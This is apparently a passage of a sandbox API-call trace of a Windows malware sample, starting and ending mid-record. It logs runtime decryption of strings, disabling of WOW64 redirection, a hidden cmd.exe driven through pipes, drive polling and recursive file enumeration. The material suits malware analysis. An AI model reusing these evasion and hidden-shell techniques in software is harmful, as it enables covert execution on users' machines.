lpDst=0x20f1668, nSize=0x25 | out: lpDst="C:\\Windows\\system32\\cmd.exe") returned 0x1c [0124.036] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0124.036] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f14d8 | out: hHeap=0x20f0000) returned 1 [0124.036] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x50) returned 0x20f14d8 [0124.036] CryptImportKey (in: hProv=0xa24cf8, pbData=0x201f8f4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x201f95c | out: phKey=0x201f95c*=0xa275f0) returned 1 [0124.036] CryptSetKeyParam (hKey=0xa275f0, dwParam=0x1, pbData=0x201f944, dwFlags=0x0) returned 1 [0124.036] CryptDecrypt (in: hKey=0xa275f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f14d8, pdwDataLen=0x201f910 | out: pbData=0x20f14d8, pdwDataLen=0x201f910) returned 1 [0124.036] CryptDestroyKey (hKey=0xa275f0) returned 1 [0124.037] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76180000 [0124.037] GetProcAddress (hModule=0x76180000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x761ad650 [0124.037] Wow64DisableWow64FsRedirection (in: OldValue=0x201fa14 | out: OldValue=0x201fa14*=0x0) returned 1 [0124.037] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f14d8 | out: hHeap=0x20f0000) returned 1 [0124.037] CreatePipe (in: hReadPipe=0x201fa20, hWritePipe=0x201fa24, lpPipeAttributes=0x201f9fc, nSize=0x0 | out: hReadPipe=0x201fa20*=0x9c, hWritePipe=0x201fa24*=0xa0) returned 1 [0124.037] CreatePipe (in: hReadPipe=0x201fa1c, hWritePipe=0x201fa18, lpPipeAttributes=0x201f9fc, nSize=0x0 | out: hReadPipe=0x201fa1c*=0xa4, hWritePipe=0x201fa18*=0xa8) returned 1 [0124.038] SetHandleInformation (hObject=0xa0, dwMask=0x1, dwFlags=0x0) returned 1 [0124.038] SetHandleInformation (hObject=0xa4, dwMask=0x1, dwFlags=0x0) returned 1 [0124.038] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x201f9a8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x9c, hStdOutput=0xa8, hStdError=0xa8), lpProcessInformation=0x201f9ec | out: lpCommandLine=0x0, lpProcessInformation=0x201f9ec*(hProcess=0xc4, hThread=0xc8, dwProcessId=0x698, dwThreadId=0x694)) returned 1 [0124.064] WriteFile (in: hFile=0xa0, lpBuffer=0x20f1538*, nNumberOfBytesToWrite=0xbc, lpNumberOfBytesWritten=0x201fa08, lpOverlapped=0x0 | out: lpBuffer=0x20f1538*, lpNumberOfBytesWritten=0x201fa08*=0xbc, lpOverlapped=0x0) returned 1 [0124.064] WaitForSingleObject (hHandle=0xc4, dwMilliseconds=0xffffffff) Thread: id = 110 os_tid = 0x5d4 [0124.039] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20f14d8 [0124.039] CryptImportKey (in: hProv=0xa24cf8, pbData=0x9af804, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x9af86c | out: phKey=0x9af86c*=0xa27800) returned 1 [0124.039] CryptSetKeyParam (hKey=0xa27800, dwParam=0x1, pbData=0x9af854, dwFlags=0x0) returned 1 [0124.039] CryptDecrypt (in: hKey=0xa27800, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f14d8, pdwDataLen=0x9af820 | out: pbData=0x20f14d8, pdwDataLen=0x9af820) returned 1 [0124.039] CryptDestroyKey (hKey=0xa27800) returned 1 [0124.039] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x14) returned 0x20f1500 [0124.039] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x14) returned 0x20f16c0 [0124.039] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20f5498 [0124.039] CryptImportKey (in: hProv=0xa24cf8, pbData=0x9af7dc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x9af844 | out: phKey=0x9af844*=0xa27800) returned 1 [0124.039] CryptSetKeyParam (hKey=0xa27800, dwParam=0x1, pbData=0x9af82c, dwFlags=0x0) returned 1 [0124.039] CryptDecrypt (in: hKey=0xa27800, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5498, pdwDataLen=0x9af7f8 | out: pbData=0x20f5498, pdwDataLen=0x9af7f8) returned 1 [0124.039] CryptDestroyKey (hKey=0xa27800) returned 1 [0124.039] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5498 | out: hHeap=0x20f0000) returned 1 [0124.039] ExpandEnvironmentStringsW (in: lpSrc="%comspec%", lpDst=0x20f1500, nSize=0xa | out: lpDst="") returned 0x1c [0124.039] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0124.039] RtlReAllocateHeap (Heap=0x20f0000, Flags=0x0, Ptr=0x20f1500, Size=0x26) returned 0x20f1500 [0124.039] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x26) returned 0x20f16c0 [0124.039] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20f5498 [0124.039] CryptImportKey (in: hProv=0xa24cf8, pbData=0x9af7d8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x9af840 | out: phKey=0x9af840*=0xa27800) returned 1 [0124.039] CryptSetKeyParam (hKey=0xa27800, dwParam=0x1, pbData=0x9af828, dwFlags=0x0) returned 1 [0124.039] CryptDecrypt (in: hKey=0xa27800, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5498, pdwDataLen=0x9af7f4 | out: pbData=0x20f5498, pdwDataLen=0x9af7f4) returned 1 [0124.039] CryptDestroyKey (hKey=0xa27800) returned 1 [0124.039] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5498 | out: hHeap=0x20f0000) returned 1 [0124.039] ExpandEnvironmentStringsW (in: lpSrc="%comspec%", lpDst=0x20f1500, nSize=0x13 | out: lpDst="") returned 0x1c [0124.039] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0124.039] RtlReAllocateHeap (Heap=0x20f0000, Flags=0x0, Ptr=0x20f1500, Size=0x4a) returned 0x20f16c0 [0124.039] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x4a) returned 0x20f5498 [0124.039] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20f54f0 [0124.039] CryptImportKey (in: hProv=0xa24cf8, pbData=0x9af7d8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x9af840 | out: phKey=0x9af840*=0xa27800) returned 1 [0124.039] CryptSetKeyParam (hKey=0xa27800, dwParam=0x1, pbData=0x9af828, dwFlags=0x0) returned 1 [0124.040] CryptDecrypt (in: hKey=0xa27800, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f54f0, pdwDataLen=0x9af7f4 | out: pbData=0x20f54f0, pdwDataLen=0x9af7f4) returned 1 [0124.040] CryptDestroyKey (hKey=0xa27800) returned 1 [0124.040] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f54f0 | out: hHeap=0x20f0000) returned 1 [0124.040] ExpandEnvironmentStringsW (in: lpSrc="%comspec%", lpDst=0x20f16c0, nSize=0x25 | out: lpDst="C:\\Windows\\system32\\cmd.exe") returned 0x1c [0124.040] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5498 | out: hHeap=0x20f0000) returned 1 [0124.040] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f14d8 | out: hHeap=0x20f0000) returned 1 [0124.040] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x50) returned 0x20f14d8 [0124.040] CryptImportKey (in: hProv=0xa24cf8, pbData=0x9af7fc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x9af864 | out: phKey=0x9af864*=0xa27800) returned 1 [0124.040] CryptSetKeyParam (hKey=0xa27800, dwParam=0x1, pbData=0x9af84c, dwFlags=0x0) returned 1 [0124.040] CryptDecrypt (in: hKey=0xa27800, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f14d8, pdwDataLen=0x9af818 | out: pbData=0x20f14d8, pdwDataLen=0x9af818) returned 1 [0124.040] CryptDestroyKey (hKey=0xa27800) returned 1 [0124.040] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76180000 [0124.040] GetProcAddress (hModule=0x76180000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x761ad650 [0124.040] Wow64DisableWow64FsRedirection (in: OldValue=0x9af91c | out: OldValue=0x9af91c*=0x0) returned 1 [0124.040] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f14d8 | out: hHeap=0x20f0000) returned 1 [0124.040] CreatePipe (in: hReadPipe=0x9af928, hWritePipe=0x9af92c, lpPipeAttributes=0x9af904, nSize=0x0 | out: hReadPipe=0x9af928*=0xac, hWritePipe=0x9af92c*=0xb0) returned 1 [0124.040] CreatePipe (in: hReadPipe=0x9af924, hWritePipe=0x9af920, lpPipeAttributes=0x9af904, nSize=0x0 | out: hReadPipe=0x9af924*=0xb4, hWritePipe=0x9af920*=0xb8) returned 1 [0124.040] SetHandleInformation (hObject=0xb0, dwMask=0x1, dwFlags=0x0) returned 1 [0124.040] SetHandleInformation (hObject=0xb4, dwMask=0x1, dwFlags=0x0) returned 1 [0124.041] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x9af8b0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xac, hStdOutput=0xb8, hStdError=0xb8), lpProcessInformation=0x9af8f4 | out: lpCommandLine=0x0, lpProcessInformation=0x9af8f4*(hProcess=0xc0, hThread=0xbc, dwProcessId=0x69c, dwThreadId=0x27c)) returned 1 [0124.059] WriteFile (in: hFile=0xb0, lpBuffer=0x20f1600*, nNumberOfBytesToWrite=0x5b, lpNumberOfBytesWritten=0x9af910, lpOverlapped=0x0 | out: lpBuffer=0x20f1600*, lpNumberOfBytesWritten=0x9af910*=0x5b, lpOverlapped=0x0) returned 1 [0124.059] WaitForSingleObject (hHandle=0xc0, dwMilliseconds=0xffffffff) returned 0x0 [0178.390] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x50) returned 0x2227820 [0178.390] CryptImportKey (in: hProv=0xa24cf8, pbData=0x9af80c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x9af874 | out: phKey=0x9af874*=0xa32c28) returned 1 [0178.390] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x9af85c, dwFlags=0x0) returned 1 [0178.390] CryptDecrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x9af828 | out: pbData=0x2227820, pdwDataLen=0x9af828) returned 1 [0178.390] CryptDestroyKey (hKey=0xa32c28) returned 1 [0178.390] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76180000 [0178.390] GetProcAddress (hModule=0x76180000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x761ad668 [0178.390] Wow64RevertWow64FsRedirection (OlValue=0x9af91c) returned 1 [0178.391] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0178.391] CloseHandle (hObject=0xc0) returned 1 [0178.391] CloseHandle (hObject=0xbc) returned 1 [0178.391] CloseHandle (hObject=0xac) returned 1 [0178.391] CloseHandle (hObject=0xb0) returned 1 [0178.391] CloseHandle (hObject=0xb4) returned 1 [0178.391] CloseHandle (hObject=0xb8) returned 1 [0178.391] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0178.391] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 Thread: id = 133 os_tid = 0x310 Thread: id = 134 os_tid = 0x60c [0132.626] GetLogicalDrives () returned 0x4 [0132.626] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f5910 [0132.626] CryptImportKey (in: hProv=0xa24cf8, pbData=0x269fb60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x269fbc8 | out: phKey=0x269fbc8*=0xa27988) returned 1 [0132.626] CryptSetKeyParam (hKey=0xa27988, dwParam=0x1, pbData=0x269fbb0, dwFlags=0x0) returned 1 [0132.626] CryptDecrypt (in: hKey=0xa27988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5910, pdwDataLen=0x269fb7c | out: pbData=0x20f5910, pdwDataLen=0x269fb7c) returned 1 [0132.626] CryptDestroyKey (hKey=0xa27988) returned 1 [0132.626] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x28) returned 0x20f14a0 [0132.626] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xd8 [0132.626] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xdc [0132.626] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10) returned 0x2226c20 [0132.626] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0xe) returned 0x2226c08 [0132.626] ResetEvent (hEvent=0xdc) returned 1 [0132.626] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x833b2e, lpParameter=0x2226c20, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xe0 [0132.627] CloseHandle (hObject=0xe0) returned 1 [0132.627] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10) returned 0x2226bf0 [0132.627] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0xe) returned 0x2226bd8 [0132.627] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x833b2e, lpParameter=0x2226bf0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xe0 [0132.627] CloseHandle (hObject=0xe0) returned 1 [0132.627] WaitForSingleObject (hHandle=0xdc, dwMilliseconds=0xffffffff) returned 0x0 [0212.564] CloseHandle (hObject=0xdc) returned 1 [0212.564] CloseHandle (hObject=0xd8) returned 1 [0212.564] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f14a0 | out: hHeap=0x20f0000) returned 1 [0212.564] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5910 | out: hHeap=0x20f0000) returned 1 Thread: id = 135 os_tid = 0x61c [0132.628] GetLogicalDrives () returned 0x4 [0132.628] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f5958 [0132.628] CryptImportKey (in: hProv=0xa24cf8, pbData=0x28afe40, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x28afea8 | out: phKey=0x28afea8*=0xa27988) returned 1 [0132.628] CryptSetKeyParam (hKey=0xa27988, dwParam=0x1, pbData=0x28afe90, dwFlags=0x0) returned 1 [0132.628] CryptDecrypt (in: hKey=0xa27988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5958, pdwDataLen=0x28afe5c | out: pbData=0x20f5958, pdwDataLen=0x28afe5c) returned 1 [0132.628] CryptDestroyKey (hKey=0xa27988) returned 1 [0132.628] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x28) returned 0x20f59a0 [0132.628] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xe0 [0132.628] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xe4 [0132.628] GetLogicalDrives () returned 0x4 [0132.628] Sleep (dwMilliseconds=0x3e8) [0133.639] GetLogicalDrives () returned 0x4 [0133.639] Sleep (dwMilliseconds=0x3e8) [0135.135] GetLogicalDrives () returned 0x4 [0135.135] Sleep (dwMilliseconds=0x3e8) [0136.149] GetLogicalDrives () returned 0x4 [0136.149] Sleep (dwMilliseconds=0x3e8) [0137.241] GetLogicalDrives () returned 0x4 [0137.241] Sleep (dwMilliseconds=0x3e8) [0138.559] GetLogicalDrives () returned 0x4 [0138.559] Sleep (dwMilliseconds=0x3e8) [0139.569] GetLogicalDrives () returned 0x4 [0139.569] Sleep (dwMilliseconds=0x3e8) [0140.581] GetLogicalDrives () returned 0x4 [0140.581] Sleep (dwMilliseconds=0x3e8) [0142.056] GetLogicalDrives () returned 0x4 [0142.056] Sleep (dwMilliseconds=0x3e8) [0143.886] GetLogicalDrives () returned 0x4 [0143.886] Sleep (dwMilliseconds=0x3e8) [0145.248] GetLogicalDrives () returned 0x4 [0145.248] Sleep (dwMilliseconds=0x3e8) [0147.383] GetLogicalDrives () returned 0x4 [0147.383] Sleep (dwMilliseconds=0x3e8) [0148.478] GetLogicalDrives () returned 0x4 [0148.478] Sleep (dwMilliseconds=0x3e8) [0149.944] GetLogicalDrives () returned 0x4 [0149.944] Sleep (dwMilliseconds=0x3e8) [0151.067] GetLogicalDrives () returned 0x4 [0151.067] Sleep (dwMilliseconds=0x3e8) [0152.741] GetLogicalDrives () returned 0x4 [0152.741] Sleep (dwMilliseconds=0x3e8) [0154.505] GetLogicalDrives () returned 0x4 [0154.505] Sleep (dwMilliseconds=0x3e8) [0155.510] GetLogicalDrives () returned 0x4 [0155.510] Sleep (dwMilliseconds=0x3e8) [0156.524] GetLogicalDrives () returned 0x4 [0156.524] Sleep (dwMilliseconds=0x3e8) [0157.627] GetLogicalDrives () returned 0x4 [0157.627] Sleep (dwMilliseconds=0x3e8) [0158.704] GetLogicalDrives () returned 0x4 [0158.704] Sleep (dwMilliseconds=0x3e8) [0159.709] GetLogicalDrives () returned 0x4 [0159.709] Sleep (dwMilliseconds=0x3e8) [0160.734] GetLogicalDrives () returned 0x4 [0160.734] Sleep (dwMilliseconds=0x3e8) [0162.220] GetLogicalDrives () returned 0x4 [0162.220] Sleep (dwMilliseconds=0x3e8) [0163.232] GetLogicalDrives () returned 0x4 [0163.232] Sleep (dwMilliseconds=0x3e8) [0164.274] GetLogicalDrives () returned 0x4 [0164.274] Sleep (dwMilliseconds=0x3e8) [0165.558] GetLogicalDrives () returned 0x4 [0165.558] Sleep (dwMilliseconds=0x3e8) [0166.575] GetLogicalDrives () returned 0x4 [0166.575] Sleep (dwMilliseconds=0x3e8) [0167.663] GetLogicalDrives () returned 0x4 [0167.663] Sleep (dwMilliseconds=0x3e8) [0168.676] GetLogicalDrives () returned 0x4 [0168.676] Sleep (dwMilliseconds=0x3e8) [0169.690] GetLogicalDrives () returned 0x4 [0169.690] Sleep (dwMilliseconds=0x3e8) [0170.705] GetLogicalDrives () returned 0x4 [0170.705] Sleep (dwMilliseconds=0x3e8) [0171.719] GetLogicalDrives () returned 0x4 [0171.719] Sleep (dwMilliseconds=0x3e8) [0172.857] GetLogicalDrives () returned 0x4 [0172.857] Sleep (dwMilliseconds=0x3e8) [0173.880] GetLogicalDrives () returned 0x4 [0173.880] Sleep (dwMilliseconds=0x3e8) [0174.899] GetLogicalDrives () returned 0x4 [0174.899] Sleep (dwMilliseconds=0x3e8) [0176.447] GetLogicalDrives () returned 0x4 [0176.447] Sleep (dwMilliseconds=0x3e8) [0177.548] GetLogicalDrives () returned 0x4 [0177.548] Sleep (dwMilliseconds=0x3e8) [0178.551] GetLogicalDrives () returned 0x4 [0178.551] Sleep (dwMilliseconds=0x3e8) [0179.566] GetLogicalDrives () returned 0x4 [0179.566] Sleep (dwMilliseconds=0x3e8) [0180.708] GetLogicalDrives () returned 0x4 [0180.708] Sleep (dwMilliseconds=0x3e8) [0181.798] GetLogicalDrives () returned 0x4 [0181.798] Sleep (dwMilliseconds=0x3e8) [0182.816] GetLogicalDrives () returned 0x4 [0182.816] Sleep (dwMilliseconds=0x3e8) [0183.852] GetLogicalDrives () returned 0x4 [0183.852] Sleep (dwMilliseconds=0x3e8) [0184.859] GetLogicalDrives () returned 0x4 [0184.859] Sleep (dwMilliseconds=0x3e8) [0185.875] GetLogicalDrives () returned 0x4 [0185.875] Sleep (dwMilliseconds=0x3e8) [0186.928] GetLogicalDrives () returned 0x4 [0186.928] Sleep (dwMilliseconds=0x3e8) [0187.941] GetLogicalDrives () returned 0x4 [0187.941] Sleep (dwMilliseconds=0x3e8) [0188.967] GetLogicalDrives () returned 0x4 [0188.967] Sleep (dwMilliseconds=0x3e8) [0190.040] GetLogicalDrives () returned 0x4 [0190.040] Sleep (dwMilliseconds=0x3e8) [0191.480] GetLogicalDrives () returned 0x4 [0191.480] Sleep (dwMilliseconds=0x3e8) [0192.673] GetLogicalDrives () returned 0x4 [0192.673] Sleep (dwMilliseconds=0x3e8) [0193.755] GetLogicalDrives () returned 0x4 [0193.755] Sleep (dwMilliseconds=0x3e8) [0194.768] GetLogicalDrives () returned 0x4 [0194.768] Sleep (dwMilliseconds=0x3e8) [0195.963] GetLogicalDrives () returned 0x4 [0195.963] Sleep (dwMilliseconds=0x3e8) [0197.072] GetLogicalDrives () returned 0x4 [0197.072] Sleep (dwMilliseconds=0x3e8) [0198.293] GetLogicalDrives () returned 0x4 [0198.293] Sleep (dwMilliseconds=0x3e8) [0199.355] GetLogicalDrives () returned 0x4 [0199.355] Sleep (dwMilliseconds=0x3e8) [0200.484] GetLogicalDrives () returned 0x4 [0200.485] Sleep (dwMilliseconds=0x3e8) [0201.630] GetLogicalDrives () returned 0x4 [0201.630] Sleep (dwMilliseconds=0x3e8) [0202.638] GetLogicalDrives () returned 0x4 [0202.638] Sleep (dwMilliseconds=0x3e8) [0203.656] GetLogicalDrives () returned 0x4 [0203.656] Sleep (dwMilliseconds=0x3e8) [0204.761] GetLogicalDrives () returned 0x4 [0204.761] Sleep (dwMilliseconds=0x3e8) [0205.775] GetLogicalDrives () returned 0x4 [0205.775] Sleep (dwMilliseconds=0x3e8) [0206.787] GetLogicalDrives () returned 0x4 [0206.787] Sleep (dwMilliseconds=0x3e8) [0207.802] GetLogicalDrives () returned 0x4 [0207.802] Sleep (dwMilliseconds=0x3e8) [0209.392] GetLogicalDrives () returned 0x4 [0209.392] Sleep (dwMilliseconds=0x3e8) [0211.685] GetLogicalDrives () returned 0x4 [0211.685] Sleep (dwMilliseconds=0x3e8) [0213.019] GetLogicalDrives () returned 0x4 [0213.019] Sleep (dwMilliseconds=0x3e8) [0214.226] GetLogicalDrives () returned 0x4 [0214.226] Sleep (dwMilliseconds=0x3e8) [0215.226] GetLogicalDrives () returned 0x4 [0215.227] Sleep (dwMilliseconds=0x3e8) [0216.242] GetLogicalDrives () returned 0x4 [0216.242] Sleep (dwMilliseconds=0x3e8) [0219.985] GetLogicalDrives () returned 0x4 [0219.985] Sleep (dwMilliseconds=0x3e8) [0221.201] GetLogicalDrives () returned 0x4 [0221.201] Sleep (dwMilliseconds=0x3e8) [0222.367] GetLogicalDrives () returned 0x4 [0222.367] Sleep (dwMilliseconds=0x3e8) [0223.372] GetLogicalDrives () returned 0x4 [0223.372] Sleep (dwMilliseconds=0x3e8) [0224.664] GetLogicalDrives () returned 0x4 [0224.664] Sleep (dwMilliseconds=0x3e8) [0226.006] GetLogicalDrives () returned 0x4 [0226.006] Sleep (dwMilliseconds=0x3e8) [0227.033] GetLogicalDrives () returned 0x4 [0227.033] Sleep (dwMilliseconds=0x3e8) [0228.175] GetLogicalDrives () returned 0x4 [0228.175] Sleep (dwMilliseconds=0x3e8) [0229.222] GetLogicalDrives () returned 0x4 [0229.222] Sleep (dwMilliseconds=0x3e8) [0230.237] GetLogicalDrives () returned 0x4 [0230.237] Sleep (dwMilliseconds=0x3e8) [0231.248] GetLogicalDrives () returned 0x4 [0231.248] Sleep (dwMilliseconds=0x3e8) [0232.263] GetLogicalDrives () returned 0x4 [0232.263] Sleep (dwMilliseconds=0x3e8) Thread: id = 136 os_tid = 0x684 [0132.629] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x38) returned 0x20f5498 [0132.629] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x18) returned 0x20f54d8 [0132.629] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xe8 [0132.629] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xec [0132.629] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xf0 [0132.629] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10000) returned 0x2227a48 [0132.630] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x1, lpStartAddress=0x833957, lpParameter=0x253feb0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf4 [0132.630] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x1, lpStartAddress=0x833957, lpParameter=0x253feb0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf8 [0132.631] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10000) returned 0x2237a50 [0132.631] FindFirstFileW (in: lpFileName="\\\\?\\C:\\*", lpFindFileData=0x253fc28 | out: lpFindFileData=0x253fc28) returned 0xa279c8 [0132.631] GetLastError () returned 0x0 [0132.632] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x214) returned 0x20fc2e8 [0132.632] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76180000 [0132.632] GetCurrentThreadId () returned 0x684 [0132.632] SetLastError (dwErrCode=0x0) [0132.632] GetLastError () returned 0x0 [0132.632] SetLastError (dwErrCode=0x0) [0132.632] GetLastError () returned 0x0 [0132.632] SetLastError (dwErrCode=0x0) [0132.632] GetLastError () returned 0x0 [0132.632] SetLastError (dwErrCode=0x0) [0132.632] GetLastError () returned 0x0 [0132.632] SetLastError (dwErrCode=0x0) [0132.632] GetLastError () returned 0x0 [0132.632] SetLastError (dwErrCode=0x0) [0132.632] GetLastError () returned 0x0 [0132.632] SetLastError (dwErrCode=0x0) [0132.632] GetLastError () returned 0x0 [0132.632] SetLastError (dwErrCode=0x0) [0132.632] GetLastError () returned 0x0 [0132.633] SetLastError (dwErrCode=0x0) [0132.633] GetLastError () returned 0x0 [0132.633] SetLastError (dwErrCode=0x0) [0132.633] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10000) returned 0x2247a58 [0132.633] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\*", lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 0xa281c8 [0132.633] FindNextFileW (in: hFindFile=0xa281c8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 1 [0132.633] FindNextFileW (in: hFindFile=0xa281c8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 1 [0132.633] GetLastError () returned 0x0 [0132.633] SetLastError (dwErrCode=0x0) [0132.633] GetLastError () returned 0x0 [0132.633] SetLastError (dwErrCode=0x0) [0132.633] GetLastError () returned 0x0 [0132.633] SetLastError (dwErrCode=0x0) [0132.633] GetLastError () returned 0x0 [0132.633] SetLastError (dwErrCode=0x0) [0132.633] GetLastError () returned 0x0 [0132.633] SetLastError (dwErrCode=0x0) [0132.633] GetLastError () returned 0x0 [0132.634] SetLastError (dwErrCode=0x0) [0132.634] GetLastError () returned 0x0 [0132.634] SetLastError (dwErrCode=0x0) [0132.634] GetLastError () returned 0x0 [0132.634] SetLastError (dwErrCode=0x0) [0132.634] GetLastError () returned 0x0 [0132.634] SetLastError (dwErrCode=0x0) [0132.634] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10000) returned 0x2257a60 [0132.634] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0xa28208 [0132.634] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.634] FindNextFileW (in: 